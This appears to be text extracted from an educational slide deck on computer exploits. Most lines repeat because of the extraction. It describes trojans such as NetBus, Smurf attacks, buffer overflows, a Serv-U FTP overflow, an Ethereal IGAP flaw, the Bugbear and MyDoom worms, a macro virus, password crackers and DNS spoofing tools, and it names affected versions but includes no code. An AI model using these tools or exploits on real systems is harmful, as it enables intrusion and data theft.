ExploitsExploits

Dalia SolomonDalia Solomon

CategoriesCategories Trojan Horse AttacksTrojan Horse Attacks Smurf AttackSmurf Attack Port ScanPort Scan Buffer OverflowBuffer Overflow FTP ExploitsFTP Exploits Ethereal ExploitEthereal Exploit WormWorm VirusVirus Password Cracker Password Cracker DNS SpoofingDNS Spoofing

Trojan Horse attacksTrojan Horse attacks

A computer becomes vulnerable to A computer becomes vulnerable to this attack when the user downloads this attack when the user downloads and installs a file onto their system. and installs a file onto their system.

This opens a port without the This opens a port without the knowledge of the user. The open port knowledge of the user. The open port gives the remote user access to ones gives the remote user access to ones computercomputer

Trojan Horse - NetBusTrojan Horse - NetBus

NetBus is a tool that allows a remote NetBus is a tool that allows a remote user to gain administrative privilegesuser to gain administrative privileges

NetBus consists of two programs a NetBus consists of two programs a server and a client.server and a client.

NetBus ServerNetBus Server To infect a computer, NetBus To infect a computer, NetBus

disguises itself as an ICQ disguises itself as an ICQ executable file that a naive user executable file that a naive user install on their computer.install on their computer.

NetBus ServerNetBus Server

NetBus serverNetBus server – This application will open – This application will open a backdoor on the target computer. This a backdoor on the target computer. This application can be configured to be either application can be configured to be either invisible or visible to the user.invisible or visible to the user.

NetBus ClientNetBus Client

NetBusNetBus - This - This application will application will connect to a connect to a computer that is computer that is running NetBus running NetBus server. It allows server. It allows the hacker to spy the hacker to spy and take control of and take control of the infected the infected computer.computer.

Smurf AttackSmurf Attack

A Smurf Attack occurs when a packet such A Smurf Attack occurs when a packet such as an ICMP echo frame (in this application) as an ICMP echo frame (in this application) is sent to a group of machines. is sent to a group of machines.

The packet sent has the source address The packet sent has the source address replaced by the target computer or replaced by the target computer or network IP address. This causes a flurry of network IP address. This causes a flurry of echo responses to be sent to the target echo responses to be sent to the target machine, which can overflow the target machine, which can overflow the target computer. computer.

Smurf AttackSmurf Attack

Here we are attacking Here we are attacking our computerour computer

Port ScanPort Scan

This program allows the hacker to This program allows the hacker to scan a target computer to detect scan a target computer to detect open ports. open ports.

This is primarily used to detect This is primarily used to detect vulnerable applications using certain vulnerable applications using certain ports on the target computer.ports on the target computer.

Port ScanPort Scan

Buffer OverflowBuffer Overflow

Buffer OverflowBuffer Overflow• Most common form of exploitsMost common form of exploits• Occurs when you put more data in the Occurs when you put more data in the

buffer than what it can holdbuffer than what it can hold• Occurs if bounds are not checked by Occurs if bounds are not checked by

programprogram• Purpose of buffer overflow is to execute Purpose of buffer overflow is to execute

codes and gain special privilegescodes and gain special privileges

Buffer OverflowBuffer Overflow

Buffer OverflowBuffer Overflow

Buffer OverflowBuffer Overflow

FTP ExploitsFTP Exploits

This exploit shows how it is possible This exploit shows how it is possible for somebody to get a shell for somebody to get a shell (command prompt) from Serv-U FTP (command prompt) from Serv-U FTP server. server.

This exploit causes a buffer overflow This exploit causes a buffer overflow condition to occur in Serv-U FTP condition to occur in Serv-U FTP when it parses the MDTM command.when it parses the MDTM command.

FTP ExploitsFTP Exploits

The exploit required that the user have The exploit required that the user have login access to a server.login access to a server.

FTP ExploitsFTP Exploits

This shows how the hacker gains shell This shows how the hacker gains shell access to the target machine.access to the target machine.

FTP ExploitsFTP Exploits

FTP ExploitsFTP Exploits

Here is a Here is a segment of segment of the code the code that causes that causes the buffer the buffer overflow.overflow.

Ethereal ExploitEthereal Exploit

Vulnerability exist in Ethereal. By Vulnerability exist in Ethereal. By sending carefully crafted packets to sending carefully crafted packets to the sniffed wire or by convincing the sniffed wire or by convincing someone to load a malicious packet someone to load a malicious packet capture file into Ethereal a user can capture file into Ethereal a user can overflow a buffer and execute overflow a buffer and execute malicious codemalicious code• The vulnerability exist in the following The vulnerability exist in the following

packets: BGP, EIGRP, IGAP, IRDA, ISUP, packets: BGP, EIGRP, IGAP, IRDA, ISUP, NetFlow, PGM, TCAP and UCP.NetFlow, PGM, TCAP and UCP.

Ethereal - exampleEthereal - example

Ethereal IGAP messageEthereal IGAP message• This exploits a vulnerability in Ethereal This exploits a vulnerability in Ethereal

when handling IGAP messageswhen handling IGAP messages• Works on Ethereal 0.10.0 to Ethereal Works on Ethereal 0.10.0 to Ethereal

0.10.2.0.10.2.• Will either crash Ethereal or open a port Will either crash Ethereal or open a port

that allows a user to gain root privilegesthat allows a user to gain root privileges

Ethereal - exampleEthereal - example

This code will create a malformed This code will create a malformed IGAP header that when sent, causes IGAP header that when sent, causes the Ethereal application to crash the Ethereal application to crash because of its vulnerability in handling because of its vulnerability in handling IGAP packets.IGAP packets.

WormWorm

A worm is a program that makes A worm is a program that makes copies of itself and causes major copies of itself and causes major damage to the files, software, and damage to the files, software, and datadata

Method of replication include Method of replication include • EmailEmail• File sharingFile sharing

Worm - exampleWorm - example W32/Bugbear-AW32/Bugbear-A

• Is a network worm that spreads by Is a network worm that spreads by emailing attachments of itselfemailing attachments of itself

• It creates a thread which attempts to It creates a thread which attempts to terminate anti-virus and security terminate anti-virus and security programsprograms

• The worm will log keystrokes and send The worm will log keystrokes and send this information when the user is this information when the user is connected onlineconnected online

• The worm will open port 80 on the The worm will open port 80 on the infected computerinfected computer

Worm - exampleWorm - example

http://www.sophos.com/virusinfo/analyses/w32bugbeara.html

Worm - ExampleWorm - Example

W32/MyDoom-AW32/MyDoom-A is a worm which is a worm which spreads by email. spreads by email.

When the infected attachment is When the infected attachment is launched, the worm harvests email launched, the worm harvests email addresses from address books and addresses from address books and from files with the following from files with the following extensions: WAB, TXT, HTM, SHT, extensions: WAB, TXT, HTM, SHT, PHP, ASP, DBX, TBB, ADB and PL. PHP, ASP, DBX, TBB, ADB and PL.

Worm – Example (continue…)Worm – Example (continue…)

Attached files will have an extension of Attached files will have an extension of BAT, CMD, EXE, PIF, SCR or ZIP. BAT, CMD, EXE, PIF, SCR or ZIP.

Worm – Example (continue…)Worm – Example (continue…)

the worm will attempt a denial-of-service the worm will attempt a denial-of-service attack to www.sco.com, sending numerous attack to www.sco.com, sending numerous GET requests to the web server. GET requests to the web server.

Drops a file named shimgapi.dll to the Drops a file named shimgapi.dll to the temp or system folder. This is a backdoor temp or system folder. This is a backdoor program loaded by the worm that allows program loaded by the worm that allows outsiders to connect to TCP port 3127.outsiders to connect to TCP port 3127.

http://www.sophos.com/virusinfo/analyses/http://www.sophos.com/virusinfo/analyses/w32mydooma.htmlw32mydooma.html

VirusVirus

A virus is program that infect A virus is program that infect operating system and applications.operating system and applications.

Replication methodsReplication methods• Application File (Word doc.)Application File (Word doc.)• Hard drive or Boot record (boot disk)Hard drive or Boot record (boot disk)• Scripts (batch file)Scripts (batch file)

Virus - exampleVirus - example

W97M/Marker Virus is a Word macro virus

It collects user information from Word and sends the information through FTP

It adds a log at the end of the virus body for every infected user. • This log contains information for system

time, date, users name and address

Virus - exampleVirus - example

When you open a When you open a document file it will document file it will display a messagedisplay a message

Depending on the Depending on the user’s response the user’s response the user will get one of user will get one of these messagesthese messages

Password CrackerPassword Cracker

Some applications and web pages Some applications and web pages are vulnerable to remote password are vulnerable to remote password cracker tools.cracker tools.

Application such as HTTP, FTP and Application such as HTTP, FTP and telnet that don’t handle login telnet that don’t handle login properly and have small size properly and have small size password are vulnerable to brute password are vulnerable to brute force password cracker tools.force password cracker tools.

Password - crackerPassword - cracker

Brutus is a remote password cracker tool, Brutus is a remote password cracker tool, on an older Serv-U v 2.5 application it can on an older Serv-U v 2.5 application it can crack a password by sequentially sending crack a password by sequentially sending in all possible password combinationin all possible password combination

Password - crackerPassword - cracker

DNS spoofingDNS spoofing

A DNS attack that involves A DNS attack that involves intercepting and sending a fake DNS intercepting and sending a fake DNS response to a user.response to a user.

This attack forwards the user to a This attack forwards the user to a different address than where he different address than where he wants to be.wants to be.

DNS spoofingDNS spoofing

WinDNSSpoofWinDNSSpoof• spoof DNS packetsspoof DNS packets• http://http://www.securesphere.net/download/papers/dnsspoof.htmwww.securesphere.net/download/papers/dnsspoof.htm

DNS Exploitation ToolDNS Exploitation Tool

ZodiacZodiac is a robust DNS protocol monitoring is a robust DNS protocol monitoring and spoofing programand spoofing program

Features:Features:• Captures and decodes DNS packets Captures and decodes DNS packets • DNS local spoofingDNS local spoofing• DNS ID spoofing, exploiting a weakness within DNS ID spoofing, exploiting a weakness within

the DNS protocol itself.the DNS protocol itself.• Etc…Etc…

http://teso.scene.at/projects/zodiac/http://teso.scene.at/projects/zodiac/

Questions?Questions?